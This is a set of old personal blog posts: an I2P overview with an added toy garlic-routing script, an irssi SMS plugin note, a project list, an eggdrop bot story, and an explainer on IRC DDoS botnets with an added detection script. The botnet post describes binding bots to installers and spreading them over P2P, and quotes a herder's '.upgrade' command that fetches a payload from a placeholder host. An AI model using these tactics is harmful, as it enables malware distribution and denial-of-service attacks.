I2P 101 – Inside the Invisible Internet

This article was originally written for and published at N-O-D-E on May 1st, 2016. It has been posted here for safe keeping.


The Invisible Internet Project (more commonly known as I2P) is an older, traditional darknet built from the ground up with privacy and security in mind. As with all darknets, accessing an I2P site or service is not as simple as firing a request off from your web browser as you would with any site on the traditional Internet (the clearnet). I2P is only accessible if you are running software built to access it. If you try to access an I2P service without doing your homework, you won’t be able to get anywhere. Instead of creating all new physical networking infrastructure, I2P builds upon the existing Internet to take care of physical connections between machines, creating what is known as an overlay network. This is similar to the concept of a virtual private network (VPN) wherein computers can communicate with one another comfortably, as though they were on a local area network, even though they may be thousands of miles apart.


INTRODUCTION

I2P was first released in early 2003 (only a few months after the initial release of Tor), and was designed as a communication layer for existing Internet services such as HTTP, IRC, email, etc. Unlike the clearnet, I2P focuses on anonymity and peer-to-peer communications, relying on a distributed architecture model. Unlike Tor, which is based around navigating the clearnet through the Tor network, I2P’s goal from the start was to create a destination network and was developed as such. Here, we see that the focus is on community and anonymity within it as opposed to anonymity when using the clearnet.

ROUTERS, INPROXIES & OUTPROXIES

When you connect to I2P, you are automatically set up to be a router. If you are a router, you exist as a node on the network and participate in directing or relaying the flow of data. As long as you are on the network, you are always playing a part in keeping the traffic flowing. Other users may choose to configure their nodes as inproxies. Think of an inproxy as a way to get to an I2P service from the clearnet. For example, if you wanted to visit an eepsite (an anonymous site hosted on I2P, designated by a .i2p TLD) but were not on I2P, you could visit an inproxy through the clearnet to provide you access. Other users may choose to operate outproxies. An outproxy is essentially an exit node. If you are on I2P and want to visit a clearnet site or service, your traffic is routed through an outproxy to get out of the network.

ADVANTAGES

There are numerous advantages to using I2P over another darknet such as Tor depending upon the needs of the user. With I2P, we see a strong focus on the anonymity of connections as all I2P tunnels are unidirectional. This means that separate lines of communication are opened for sending and receiving data. Further, tunnels are short-lived, decreasing the amount of information an attacker or eavesdropper could have access to. We also see differences in routing as I2P uses packet switching as opposed to circuit switching. In packet switching routing, messages are load balanced among multiple peers to get to the destination instead of a single route typical of circuit switching. In this scenario, I2P sees all peers participating in routing. I2P also implements distributed dissemination of network information. Peer information is dynamically and automatically shared across nodes instead of living on a centralized server. Additionally, we also see low overhead for running a router because every node is a router instead of a low percentage of those who choose to set one up.

GARLIC ROUTING

I2P implements garlic routing as opposed to the more well known onion routing. Both garlic routing and onion routing rely on the technique of layered encryption. On the network, traffic flows through a series of peers on the way to its final destination. Messages are encrypted multiple times by the originator using the peers’ public keys. When the message is sent out on the path and decrypted by the proper corresponding peer in the sequence, only enough information to pass the message to the next node is exposed until the message reaches its destination where the original message and routing instructions are revealed. The initial encrypted message is layered and resembles an onion that has its layers peeled back on transit.

Garlic routing extends this concept by grouping messages together. Multiple messages referred to as “bulbs” are bound together, each with its own routing instructions. This bundle is then layered just like with onion routing and sent off to peers on the way to the destination. There is no set size for how many messages are included in one bundle, providing another level of complexity in message delivery.
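The layering and bundling described above, as an added sketch that is not from the original article or the I2P code base. A SHA-256 XOR keystream stands in for encryption to each peer's public key, and the hop names, keys and the `deliver_to` field are assumptions made for illustration.

```python
import hashlib
import json

def toy_encrypt(key: bytes, data: bytes) -> bytes:
    """XOR with a SHA-256 counter keystream. Toy stand-in for encrypting to a
    peer's public key; it is its own inverse and is NOT secure."""
    stream = bytearray()
    counter = 0
    while len(stream) < len(data):
        stream += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))

def build_garlic(bulbs, path, keys):
    """Originator side: bundle every bulb with its own delivery instruction,
    then wrap the bundle once per hop, innermost layer first."""
    payload = json.dumps(
        {"bulbs": [{"deliver_to": to, "msg": msg} for to, msg in bulbs]}
    ).encode()
    next_hop = None  # the final hop has nobody to forward to
    for hop in reversed(path):
        layer = json.dumps({"next": next_hop, "body": payload.hex()}).encode()
        payload = toy_encrypt(keys[hop], layer)
        next_hop = hop
    return payload

def peel(hop, blob, keys):
    """Peer side: remove one layer; learn only the next hop and an opaque body."""
    layer = json.loads(toy_encrypt(keys[hop], blob))
    return layer["next"], bytes.fromhex(layer["body"])

def route(blob, path, keys):
    """Walk the message along the path, recording what each hop learned."""
    learned, hop = [], path[0]
    while hop is not None:
        next_hop, blob = peel(hop, blob, keys)
        learned.append((hop, next_hop))
        hop = next_hop
    # After the last layer is removed, the bundle of bulbs is readable.
    return learned, json.loads(blob)["bulbs"]

# Constructed sample data: hop names, keys and messages are made up.
KEYS = {name: hashlib.sha256(name.encode()).digest() for name in ("A", "B", "C")}
PATH = ["A", "B", "C"]
BULBS = [("service-1", "hello"), ("service-2", "status ping")]

if __name__ == "__main__":
    garlic = build_garlic(BULBS, PATH, KEYS)
    learned, delivered = route(garlic, PATH, KEYS)
    print(learned)
    print(delivered)
```

Each intermediate hop sees only the name of the next hop and a body it cannot read; the bulbs and their delivery instructions appear only after the final layer is removed.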

INSIDE THE NETWORK

Hundreds of sites and services exist for use within the I2P network, completely operated by the community. For example, Irc2P is the premier IRC network for chat. We see search engines like eepSites & Epsilon, and torrent trackers like PaTracker. Social networks like Id3nt (for microblogging) and Visibility (for publishing) are also abundant. If you can think of a service that can run on the network, it may already be operational.

FUTURE

I2P remains in active development with many releases per year and continues to be popular within its community. While I2P is not as popular as other darknets such as Tor, it remains a staple of alternative networks and is often praised for its innovative concepts. Though I2P does not focus on anonymous use of the clearnet, it is seeing active use for both peer-to-peer communication and file-sharing services.

CONCLUSION

While many may view I2P as just another darknet, it has many interesting features that aren’t readily available or implemented on other networks. Due to the community and regular updates, there is no reason to think that I2P will be going anywhere anytime soon and will only continue to grow with more awareness and support.

Over time, more and more people have embraced alternative networks and we are bound to see more usage on the horizon. However, one of the points I2P maintainers express is that the network’s small size and limited adoption may be helpful at this point in time. I2P is not as prominent in the public’s field of view, possibly protecting it from negative publicity and potential attackers.

Whether or not I2P will keep hold of its core community or expand and change with time is unknown, but for now it proves to be a unique darknet implementation with a lot of activity.

SOURCES

https://geti2p.net/en/comparison/tor
https://www.ivpn.net/privacy-guides/an-introduction-to-tor-vs-i2p
https://geti2p.net/en/about/intro
https://geti2p.net/en/docs/how/garlic-routing

––
BY MIKE DANK (@FAMICOMAN)

 

irssi-hilighttxt.pl – An irssi Plugin That SMS Messages You On Hilight

A few months ago after configuring irssi with all the IRC channels I wanted, I ran into the problem of being late to a conversation. Every few days I would check my channels only to see people reaching out to me when I wasn’t around. Sometimes I was able to ping someone to talk, other times the person left and never came back.

I had been using the faithful hilightwin.pl plugin to put all my hilights in a separate window I could monitor. I figured that with my limited knowledge of perl I could rig up something to send me an SMS text message instead of writing the hilight line to a different window in irssi where I may not get to it in time.

Using TextBelt’s free API, I was able to call a curl command from inside perl to send the message triggering my hilight to my mobile phone. It isn’t perfect, as there is some garbled text at the front of the message, but I get the message quickly and I can see not only who sends it but also the channel they are in.

Sensible text messages delivered!


I’ve put the code up on GitHub for anyone to use or improve upon. TextBelt’s API is a little limited in how many messages you can receive in a short period of time (as it should be to prevent abuse) and doesn’t support many carriers outside of the USA, so there is definitely room for improvement if another suitable API was found.

Check it out and let me know what you think!

 

The Summer Backlog

Every Summer I speculate that I’m going to have an unbelievable amount of free time. It will always be so fantastic and freeing. I’ll be done school, working a stress-free job, and there will be so much unscheduled time that I’ll just get bored and come up with hundreds of new tasks for myself.

This never happens.

Well, the having-free-time-thing never happens but I do take on new activities anyway. After enough time, I end up with a bunch of things I’ve been meaning to do, and work on them impulsively at sporadic intervals. Everything moves forward, slow and steady, but in an agonizing and chaotic fashion.

I do make time for my projects, but the available time is fluctuating as the years go by. When I started these projects all I had was time and energy, but no money. Now, I seem to find myself with a modest amount of money and energy, but no time. Eventually, I’m doomed to have time and money, but no energy. This is the vicious cycle, and here I find myself in the second stage.

Without organization, every project falls on its face. I’m a big proponent of organization, especially when I have so much going on. After a while, you just need to keep track and work smarter (or risk meeting some men who want to put you in a straitjacket). Below, I’ve outlined (to the best of my ability) the various projects I’m working on, and where they need to go next. Hopefully this not only helps me stay on track but also gives you something to yell at me about the next time you see me.

Obsoleet
I’ve actually had most of an episode filmed for a long time by this point. The only problem that I faced was the audio cut out at the end of one of the shots. After I redo it, which I wanted to do anyway, the footage should be mostly set to go into editing. Additionally, I’d like to film a little skit for the intro if I can manage it. Editing usually doesn’t take a whole lot of time, though I do want to try out some new software and I have to cut a brand new introduction. High definition video also proves to be more of a hassle and take some more (read unplanned) time.

Anarchivism
This one is going along pretty well, especially recently. On the scanning side of things, I have plenty of stuff coming in but not a lot going up. The scanner I have is awful when it comes down to conducting magazine scans and I’ll have to look for something beefier before going full tilt on my library. As an aside, I’ve more or less created the most complete wiki of hacker magazines complete with information on them as far as I can tell. With my current rig, I can pump out some more Blacklisted! 411 issues without much hesitation.

Going after Revision3 has slowed a little, but I can get back into it with some one-liners soon. Getting to other odds and ends comes and goes as I find them. The only section that could have hours poured into it is the hacker con category. The videos I find not only have different ways of being obtained but also get updated with a new crop annually, so everything is constantly in flux. I’m trying to hunt down some of the more difficult stuff as well as fill in actual information about the conferences. If you want to help out, please do.

TechTat
This one is more or less dead due to lack of interest. While it was cool having a collaboration site for retro tech, it lost its luster after a few months. I considered turning TechTat into an audio podcast but I’m not sure how that would turn out. I’m certain I can find some use for the concept.

ChannelEM
ChannelEM keeps trucking on, but is prone to frequent crashing. It does seem to get more stable after software updates, but still ultimately hangs. I want to take a look at the scripting done to run the station and see if I can put in any fail-safes to stop the crashing. CEM also needs a rotation update with any new episodes. Further, the idea of getting new shows to join up is a bit fruitless now, but the site does well as it stands. For no real reason at all, I’d like to see if I can add on to the existing scripts and create a JSON API with scheduling information.

Moonlit has also been working on some very interesting video projects that I’d like to integrate which would completely change the look and feel of both the site and the content.

Raunchy Taco
More or less in a standstill. The stability fluctuates and there isn’t that much going on there anyway. The IRC server is really only kept up if Ethan, Pat, and myself need a place to chat. For a network that has been off-and-on for 6-7 years, we have empty periods like this all the time. I’d like to just keep it up if I can.

The IPTV Archive
More or less in waiting. I put up a hefty amount of content, and then ultimately mirrored it to Internet Archive where it can live forever. If I had the time, I’d spend it doing more detective work for the missing shows- there is always more detective work to do. There are probably a half dozen more smaller shows I could throw up at some point but nothing too pressing.

Additionally, when I started the site I used Blip because it had (arguably) the best quality at the time. Now, YouTube has eclipsed it. There was a bit of panic a few months back about some Blip channels being closed down for no reason and I have to entertain the idea that this could happen to me. If that happens, the whole library would likely need to be moved to YouTube. A big move, but likely a nice one for the content.

Moreover, I’ve also considered moving the content over to Anarchivism as it would be a much more flexible platform.

House Keeping and Solo Projects
I enjoy writing and I’d like to do more of it. Besides just being more active here, I’d like to get back into writing for other outlets. I’m thinking of more for The New Tech, and another for my local 2600 group. I’ve also been playing around with Medium (I like the concept but it still might be pretentious dribble) and would like to publish another article through it. I’m looking into 2-3 print publications as well if I can come up with the right topics and go into those pieces with the right energy.

Aside from my web work, I have a bunch of little, lower-profile things going on that I need to get out of the way.

I recently got a display for my Apple G5, so I can let it run as a capture PC for video transfers. I already have an ADVC box hooked up and the machine captures great… but it needs a monitor hooked up to run. Then, I can do more video transfers which can ultimately pop up in other places (Maybe a found footage section on Anarchivism).

I want to set up a dedicated headless Linux server for staging web projects amongst other things. I might also have it just run wget scripts all day or some custom web crawlers or who knows what else.

I have an old cocktail arcade cabinet that needs some love. If the original electronics are beyond repair, it would be nice to outfit the cab with new hardware and set up a MAME machine.

More Raspberry Pi projects would be nice. I like having the Incredible Pi set up as a PBX but I feel like I could do more with it. I have another Pi set up as a media center that I use often. I’m currently setting up a Bitcoin mining rig with another and still have many more ideas. Raspberry Pi cluster? Telnet BBS? BBS hooked into the PBX? The possibilities are endless.

Paranoia kicks in with regard to my data. I have a dozen or so terabytes worth and I need to clean data off of old drives, sort it, duplicate it, and duplicate the data that’s already there. To make matters worse, I’m constantly downloading more.

A CJDNS Meshnet node has also been in the works for a long time. I tried to set up my first one on a PogoPlug and while I eventually got the software to compile, I couldn’t connect to anybody. It may be time for another try, and possibly on a “normal” box before adapting it to the PogoPlug.

I’m experimenting with a few more programming languages and development environments. Recently, I’ve looked into running some Go, and am learning a great deal of JavaScript. I’d like to look into C# and also play with the Unity engine. Aside from these, I’m reasonably proficient at Android development and might be tying this in with another project of a friend’s.

And the list goes on.

 

There’s a lot of things here- a hell of a lot of things. I’d be lying if I said that there weren’t going to be even more. Hopefully, as I now have a nice little outline, I’ll be able to zero-in my focus and get some work done.

In the meantime, sit back and enjoy the show.

 

Dropping Eggs

So last night, while doing nothing, I decided to fool around with eggdrop IRC bots. I specifically used Windrop to run on my desktop for easy testing and whatnot, but one day I hope to toss this thing on a nix shell and get it off a personal PC.

The config file was daunting. This wasn’t the first time I made one of these bots, but since I had originally, the config base file has been altered somewhat, and is far more complex. After I partly configured it, there was the problem of commenting out all the kill commands that were put in it to make sure you went through the entire file thoroughly. Needless to say, I didn’t, and probably wasted more time looking for those damn lines than it would have taken to just read the entire thing. Then there was the problem that the bot worked, but it would flip out when opped and do crazy things to the channel and people. I couldn’t fix this without reinstalling the bot, and the torment continued.

After maybe seven re-edits, the thing became stable enough to op, and utilized some key features. TCL scripts add so much functionality to these bots I wonder why anyone would use them for anything else. I mean, I can see these bots back in the day used in place for various services, but now, they are just kinda knick-knacks. TCL scripts allow regular programmers to go off and create bot code without modifying any key files. These scripts are add-ons, or modules if you will.

So now, I have all these scripts on the bot. Weather, horoscopes, seen commands, etc. It all functions well, six hours after starting. Possibly the best feature I integrated into this bot is the ability to read RSS. I now have a use for these feeds I have been compiling. The beauty is, the bot will check the forums, and the rest of the site every half an hour. If something in the feed is new, the bot will announce it to the channel. Refreshing the pages waiting to see updates becomes obsolete.

 

Botnets

So a little bit ago, must have been last year judging now, I was into what some call “Botnet Hunting”. As in, I would go and search for active malicious botnets, pretend to be a bot, connect, and wait out on the server to see what was going on and what information I could gather.

To understand what I was doing, there is first the concept of what a botnet is and consists of. I will specifically be talking of DDoS botnets. Every botnet starts with a person, or botnet herder. The bot herder starts by setting up an IRC server. IRC is an acronym for Internet Relay Chat, a fairly common messaging protocol based around chat on servers, and networks of servers (such as the elcycle chat). Think chatrooms, but with much more control and capability. So, the bot herder sets up a server and configures it to not be picked up by any IRC indexing services that could expose the server to the general public in any way. Once the server is set up, the bot herder acquires a (usually free) DNS mask. The DNS mask will take the server’s IP (Internet Protocol) address and give it something similar to a domain name for connection. Free ones are usually chosen from services such as No-Ip or DynDNS and are used in a temporary fashion. Nothing of the bot herder’s personal information is left with the service, because they are free.

Next, the bot herder works on the bot code. Commonly, sources are taken and modified to the herder’s liking, but sometimes these bot codes are made from scratch. Common bot scripts are created and compiled in C++ though I have seen some in other languages. The purpose of this code is to connect the victim’s machine to the IRC server the bot herder had set up, and assign it a nickname based on the OS of the infected computer, as well as a number (either random or based on the victim’s location, for example a bot nick could be “XP|73590257”). This bot code is very lightweight, designed to hide from anti-virus programs, set to run every time the computer restarts, and embedded into the registry. It would not be a surprise if you had one of these bots infecting you with no knowledge.

After the bot code is compiled into an executable (a .exe file), the malicious file is then usually bound to another legit executable. For example, this bot file could be hidden within a Firefox installer and be launched covertly when you try to install Firefox. Because of the design, you would be unaware the bot code was even being run. The binders that combine the executables are also easily found and used. Some of the programs that bot herders use come with Windows distros and are expected to be used to make install packages for mass updates.

The hardest step is distribution of the infected file. Thankfully, there are many unintelligent internet users who will blindly download and install anything as long as they think it will do what they desire. Consider releasing this application on a P2P network (Limewire, Kazaa) with a bogus name and having victims willingly download.

Once they download and run the file, that’s all it takes. The bot infects the computer, hides itself, covers its tracks, and then connects to the IRC server. Sometimes, these bots are a bit more sophisticated and can contain a RAT (Remote Access Trojan). This bot herder could gain full control of the victim’s machine, and take things like stored internet logs and credit card numbers, as well as send a copy of itself to everyone in the computer’s email address book.

Once on the IRC server, the bot joins a channel (room) and waits. The bot herder then goes to this room whenever he/she pleases and takes control of the bots using several commands (these commands usually start with a period, for example “.upgrade http://xxxxx.com/botupdatefilename.xxx”). The main purpose of these bots is Distributed Denial of Service attacks on servers. The bot herder will issue a command to all the bots and tell them to all ping a single server. The amount of ping the server gets is too great, and causes the server to lock up and go offline. The more bots there are, the quicker this will happen. Some botnets have been found to have populations in the area of hundreds of thousands and could render a server useless quickly.
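A defender-side check built on the two traits described above, the OS-tagged nickname and the period-prefixed command, run over constructed raw IRC lines. This is an added example, not code from the original post; the regexes, the thresholds and every sample nick other than “XP|73590257” are assumptions.

```python
import re
from collections import defaultdict

# Nick shape taken from the article's example "XP|73590257":
# a short OS tag, a pipe, then a run of digits.
BOT_NICK = re.compile(r"^[A-Za-z0-9]{2,8}\|\d{4,}$")
# Herder commands "usually start with a period", e.g. ".upgrade <url>".
DOT_COMMAND = re.compile(r"^\.([a-z]+)(?:\s|$)")
# Minimal parser for the two raw IRC line types this check needs.
IRC_LINE = re.compile(
    r"^:(?P<nick>[^!\s]+)!\S+ (?P<verb>JOIN|PRIVMSG) "
    r":?(?P<chan>#\S+)(?: :(?P<text>.*))?$"
)

# Constructed sample capture (documentation-range addresses, made-up channels).
SAMPLE_LOG = """\
:XP|73590257!u@192.0.2.10 JOIN :#x9
:XP|22017764!u@192.0.2.11 JOIN :#x9
:2K|10448213!u@192.0.2.12 JOIN :#x9
:herder!h@192.0.2.99 JOIN :#x9
:herder!h@192.0.2.99 PRIVMSG #x9 :.upgrade http://xxxxx.com/botupdatefilename.xxx
:alice!a@192.0.2.20 JOIN :#linux
:bob!b@192.0.2.21 JOIN :#linux
:bob!b@192.0.2.21 PRIVMSG #linux :.weather Philadelphia
:alice!a@192.0.2.20 PRIVMSG #linux :anyone tried the new kernel?
"""

def analyze(lines):
    """Collect, per channel, who joined, which nicks look bot-generated,
    and which messages look like period-prefixed commands."""
    chans = defaultdict(lambda: {"members": set(), "bot_nicks": set(), "commands": []})
    for line in lines:
        m = IRC_LINE.match(line.strip())
        if not m:
            continue
        chan = chans[m["chan"]]
        if m["verb"] == "JOIN":
            chan["members"].add(m["nick"])
            if BOT_NICK.match(m["nick"]):
                chan["bot_nicks"].add(m["nick"])
        elif m["text"]:
            cmd = DOT_COMMAND.match(m["text"])
            if cmd:
                chan["commands"].append((m["nick"], cmd[1]))
    return chans

def suspicious_channels(lines, min_bots=3, min_ratio=0.5):
    """Flag a channel only when both traits coincide: mostly bot-shaped nicks
    AND at least one dot command. Dot commands alone are common on ordinary
    channels (utility bots use them too), so they are not enough by themselves."""
    hits = []
    for name, chan in analyze(lines).items():
        ratio = len(chan["bot_nicks"]) / max(len(chan["members"]), 1)
        if len(chan["bot_nicks"]) >= min_bots and ratio >= min_ratio and chan["commands"]:
            hits.append((name, sorted(chan["bot_nicks"]), chan["commands"]))
    return sorted(hits)

if __name__ == "__main__":
    for hit in suspicious_channels(SAMPLE_LOG.splitlines()):
        print(hit)
```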

The bot herder does not always restrict this botnet to self-use, and can offer services to other groups in exchange for information, stolen passwords, money, etc. Botnets have also been used recently against various websites that deal with scientology.